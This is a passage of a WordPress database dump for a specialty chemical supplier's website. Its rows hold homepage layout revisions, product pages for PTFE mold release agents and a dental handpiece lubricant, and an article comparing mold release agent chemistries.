text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-12 11:41:09', '2016-09-12 11:41:09', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1517, 1, '2016-09-12 11:42:28', '2016-09-12 11:42:28', '[ux_banner_grid height="400px" padding="0px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="152px" bg="#002c56" link="https://www.miller-stephenson.com/about/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="232px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="chemicals/medical-chemicals/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-12 11:42:28', '2016-09-12 11:42:28', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1518, 3, '2017-06-05 12:35:00', '2017-06-05 12:35:00', '<h2>MS-143XD | Dry Film Mold Release Agent</h2>\n<h3>Efficient, Consistent Release Properties; Fast-Drying; No VOC;</h3>\nMS-143XD is a versatile and robust dry film mold release agent / lubricant, which utilizes a rapidly drying, VOC exempt carrier solvent to enhance throughput and production efficiency. The formulation contains a high lubricity, low molecular weight PTFE fluoropolymer designed to not interfere with posting finishing operations.  MS-143XD offers the following benefits:\n<ul>\n 	<li>Efficient, consistent release of molded parts</li>\n 	<li>Outstanding lubricity and minimization of slip-stick</li>\n 	<li>VOC exempt formulation</li>\n 	<li>Nonflammable, Non-ozone depleting</li>\n 	<li>Non-migrating; Non-staining</li>\n</ul>\nMiller-Stephenson has been developing PTFE release agents for over 40 years.  This class of release agent yields a uniform, dry film on the mold surface while also offering superior surface adhesion and durability.  PTFE mold release agents typically can last numerous molding cycles before re-application is necessary, and is ideal for compression and transfer molding operations.  One drawback is its relatively poor performance in injection molding, which requires surface slip that PTFE dry films cannot achieve. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with the sensitive electronics.\n\nProduction engineers will typically choose a PTFE Dry Film mold release agent if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s MS-122AV and MS-122SE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\n\nMiller-Stephenson offers a selection of specialized formulations which provide high performance solutions for your molding process.  All variants of the MS-122 Series will deliver higher productivity, lower rejection rates, and higher quality products.  Please use the product selection guide below to help direct you to the appropriate product.\n\n<a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a>', 'MS-143XD | Dry Film Mold Release Agent', 'MS-143XD is a versatile and robust release agent / dry lubricant, which utilizes a rapidly drying, VOC exempt carrier solvent to enhance throughput and production efficiency. The formulation contains a high lubricity, low molecular weight PTFE fluoropolymer designed to not interfere with posting finishing operations.  MS-143XD offers the following benefits:\n<ul>\n 	<li>Efficient, consistent release of molded parts</li>\n 	<li>Outstanding lubricity and minimization of slip-stick</li>\n 	<li>VOC exempt formulation</li>\n 	<li>Nonflammable, Non-ozone depleting</li>\n 	<li>Non-migrating; Non-staining</li>\n</ul>', 'inherit', 'closed', 'closed', '', '306-autosave-v1', '', '', '2017-06-05 12:35:00', '2017-06-05 12:35:00', '', 306, 'https://132.148.10.86/wordpress/306-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1519, 3, '2016-09-12 13:21:14', '2016-09-12 13:21:14', '', 'PTFE Mold Release Agent', '', 'inherit', 'open', 'closed', '', 'ms-122se-aerospace', '', '', '2016-11-23 18:49:29', '2016-11-23 18:49:29', '', 302, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/MS-122SE-Aerospace.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1520, 3, '2016-09-12 13:33:13', '2016-09-12 13:33:13', 'Universal PTFE Release Agent', 'Universal PTFE Release Agent', 'Universal PTFE Release Agent', 'inherit', 'open', 'closed', '', 'ms-143ax-2', '', '', '2016-10-10 16:59:00', '2016-10-10 16:59:00', '', 305, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/MS-143AX-.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1521, 3, '2016-09-12 13:39:07', '2016-09-12 13:39:07', '', 'PTFE Mold Release Agents MS-143TE', '', 'inherit', 'open', 'closed', '', 'ms-143te-2', '', '', '2016-11-23 18:51:23', '2016-11-23 18:51:23', '', 303, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/MS-143TE.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1522, 3, '2016-09-12 13:52:16', '2016-09-12 13:52:16', '', 'Dry Film Mold Release Agent', '', 'inherit', 'open', 'closed', '', 'ms-143xd-2', '', '', '2016-11-23 18:53:04', '2016-11-23 18:53:04', '', 306, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/MS-143XD.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1523, 1, '2016-09-12 14:30:52', '2016-09-12 14:30:52', '[ux_banner_grid height="400px" padding="0px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="152px" bg="#002c56" link="https://www.miller-stephenson.com/about/" text_color="light" text_width="60%" text_bg="#002c56" padding="0px"]\r\n\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%" padding="0px"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="232px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="chemicals/medical-chemicals/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-12 14:30:52', '2016-09-12 14:30:52', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1524, 3, '2016-09-12 14:44:23', '2016-09-12 14:44:23', 'Few medical applications challenge a bearing lubricant more than  high-<wbr />speed dental handpieces.  Rotating at speeds of excess of 500,000 rpm, these handpieces require advanced lubrication which can not only maintain excellent thin-<wbr />film strength, but also do not degrade under the immense mechanical and thermal stresses which occur within these handpieces turbines.\r\n\r\nPictured above is a head-<wbr />to-<wbr />head evaluation of a popular handpiece lubricant versus Miller-<wbr />Stephenson’s FluoroExtreme™ . The handpieces were cleaned and lubricated, then challenged with 3 hours of continuous use at the recommended operating air pressure / rpm. The handpieces were then disassembled and evaluated for wear and deposit formation. The Industry Standard lubricant suffered from catastrophic breakdown resulting in degradation of the o-<wbr />rings, wore impellers and the lubricant itself resulting in large deposit formation and a very noticeable increase in audible noise during operation.\r\n\r\nIn contrary, FluoroExtreme™  developed no deposits, the o-<wbr />rings remained intact, and the impellers exhibited minimal wear.  The handpiece also had no noticeable increase in turbine noise. The data clearly shows that Miller-<wbr />Stephenson’s FluoroExtreme™, utilizing our proprietary fluorinated synthetic lubricant delivers substantially improved operation of your dental handpiece. Our lubricant minimizes the unsightly degradation seen with hydrocarbon-<wbr />based lubricants while maintaining quiet and clean operation.  Something both the operator and patient will value.\r\n\r\n<strong>Product Description</strong>\r\n\r\nFluoroExtreme™ is a fluorinated synthetic lubricant specially designed for dental handpieces. This lubricant offers superior protection, lubricity, and chemical stability versus standard hydrocarbon based dental lubricants. FluoroExtreme™ minimizes mechanical wear in all low and high speed handpieces, allowing devices to run longer and quieter  while reducing costly repair intervals.\r\n<p class="Body"><strong><span class="C-13">Benefits and Characteristics</span></strong></p>\r\n\r\n<ul>\r\n 	<li class="Body P-5"><span class="C-8">Minimizes mechanical wear</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Reduction in debris formation; Quieter operation</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Extends service life of critical components</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Non-<wbr />Flammable; Chemical and Thermal stability</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Biocompatible (ISO 10993)</span></li>\r\n</ul>', 'Dental Handpiece Lubricant', '', 'inherit', 'closed', 'closed', '', '1128-revision-v1', '', '', '2016-09-12 14:44:23', '2016-09-12 14:44:23', '', 1128, 'https://132.148.10.86/wordpress/1128-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1525, 3, '2016-09-12 15:13:02', '2016-09-12 15:13:02', '<h2>Mold Release Agent: Which is right for you?</h2>\r\n<h3>Miller-Stephenson’s exclusive mold release product lines offer advanced chemistry and modern, eco-friendly formulations for the molding industry.</h3>\r\nMold release agent application provide the critical barrier between the molding surface and substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agent are available and which variant would compliment their production method.  There are several distinct release agents categories: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Reactive polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason, manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and reactive polysiloxanes.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release agent solutions for it customers, hence our companies specializes in providing advanced release chemistry. Our company is 100% back-integrated meaning our manufacturing, inventory, and quality are maintained regardless of fluctuations in the market.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n<h3><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agent/"><strong>PTFE Dry Film Mold Release Agent</strong></a></h3>\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong>[/caption]\r\n\r\nMiller-Stephenson\'s PTFE mold release agent solutions (MS-122 and MS-143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform dry, thin films that exhibit excellent surface adhesion and durability. Miller-Stephenson PTFE release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed. PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers. PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.\r\n\r\nProduction engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. Our PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with sensitive electronics. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a></strong> are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n<h3><strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">Reactive polysiloxanes</a> (ReleaSys™) Mold Release Agent</strong></h3>\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> <strong><a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a></strong> excels are molding of large composite structures, yielding efficient release, cycle after cycle.[/caption]\r\n\r\nReactive polysiloxanes are the newest generation of mold release agent, designed to crosslink and bind to the mold surface.  <strong>These semi-permanent mold release agent chemistries generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.</strong>  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 550-600 F. Other reactive siloxanes provide a rapid cure, even at room temperature, with a minimum reduction in durability and abrasion resistance.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in irregular curing and transfer can occur.  Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.\r\n\r\nMiller-Stephenson\'s new <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys™ product</a></strong> line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys™ is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n<h3>Innovative Chemistry, Superior Cost-Effectiveness, and Unmatched Technical Service</h3>\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\n[ux_product_categories ids="21,16,20" number="10"]\r\n\r\nTo learn more about our mold release agents please <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For any questions about proper application of our mold release products please view our article which discusses this process</strong></a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n 	<li><strong><a href="https://en.wikipedia.org/wiki/Release_agent">Understanding Release Agents</a></strong></li>\r\n</ul>', 'Mold Release Agent Chemistries: Which is right for you?', '', 'publish', 'closed', 'closed', '', 'mold-release-agent', '', '', '2017-07-19 19:36:44', '2017-07-19 19:36:44', '', 0, 'https://132.148.10.86/wordpress/?p=1525', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (1527, 1, '2016-09-12 15:03:26', '2016-09-12 15:03:26', '[ux_banner_grid]\r\n\r\n[col span="4"]\r\n[ux_banner height="200px" bg=""] [/ux_banner]\r\n[/col]\r\n\r\n[col span="3" ]\r\n[ux_banner height="500px" bg=""] [/ux_banner]\r\n[/col]\r\n\r\n[col span="2" ]\r\n[ux_banner height="242px" bg=""] [/ux_banner]\r\n[/col]\r\n\r\n[col span="4"]\r\n[ux_banner height="284px" bg=""] [/ux_banner]\r\n[/col]\r\n\r\n\r\n[col span="2"]\r\n[ux_banner height="162px" bg=""] [/ux_banner]\r\n[/col]\r\n\r\n[col span="2" ]\r\n[ux_banner height="322px" bg=""] [/ux_banner]\r\n[/col]\r\n\r\n[col span="2"]\r\n[ux_banner height="242px" bg=""] [/ux_banner]\r\n[/col]\r\n\r\n[/ux_banner_grid]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-12 15:03:26', '2016-09-12 15:03:26', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
